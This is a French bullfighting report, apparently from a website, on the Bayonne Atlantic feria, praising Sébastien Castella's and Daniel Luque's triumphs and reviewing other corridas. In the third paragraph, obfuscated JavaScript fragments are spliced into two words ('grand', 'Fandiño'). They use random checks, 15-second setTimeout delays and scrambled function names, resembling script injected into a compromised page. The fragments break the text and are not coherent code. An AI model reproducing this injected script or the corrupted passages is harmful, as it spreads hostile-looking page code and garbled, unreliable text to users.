LE TRIOMPHE DE LA MATURITÉ

Bayonne, feria de l’Atlantique. Il est vrai que la nouvelle fournée de matadors amène de l’air frais, de la compétitivité, des espoirs renouvelés, mais ce n’est pas pour autant qu’il faut dénigrer la maturité, cette expérience qui élève au plus haut la tauromachie. Les deux protagonistes majeurs de ce week-end à Bayonne ont été un torero avec plus de quinze ans d’alternative, Sébastien Castella, et un homme jeune mais matador expérimenté, Daniel Luque.

Le torero français a réalisé une faena pleine d’émotion, se jouant la peau devant un toro d’Alcurrucen qui le cherchait à chaque charge. Faena vécue intensément, avec les arènes séduites, captivées par la puissance d’un torero engagé avec une technique éblouissante. Il coupa deux oreilles méritées. Ce que fit Luque fut tout en caresses, avec du temple et en même temps du pouvoir. Face à deux toros réticents d’Alcurrucen où il ne put pas briller avec son toreo de cape, mais il les accueillit tous les deux doucement, sans la moindre brusquerie. Il paria sur eux à la muleta alors qu’ils ne voulaient pas le suivre, mais il leur montra le chemin, passe après passe, certaines exquises. Toreo réfléchi, serein, de très haut niveau, celui d’un maestro. Malgré avoir dû descabeller ses deux toros, il coupa deux oreilles et sortit pour la septième fois d’affilée a hombros de Bayonne.

Lors de cette même corrida José Garrido coupa une oreille à un grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and toro d’Alcurrucen lors d’une faena inégale, avec de l’engagement mais pas toujours dans le tempo. Il fut plus convainquant devant le toro compliqué qui clôtura la feria. La veille, la corrida de Pedrés fut décevante, beaucoup trop lourde, ils étaient incapables de charger. Curro Díaz, malgré sa bonne volonté, ne put rien en tirer ; Javier Jiménez interpella les aficionados par son courage, sa tranquillité entre les cornes des toros et Iván Fandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andiño put extraire quelques passes du toro mieux fait de la course mais qui se dégonfla trop tôt. La feria démarra avec une novillada encastée de Los Maños qui plut au public, où chacun des novilleros coupa une oreille, Adrien Salenc étant déclaré de la triomphateur de la soirée.

Les commentaires sont fermés.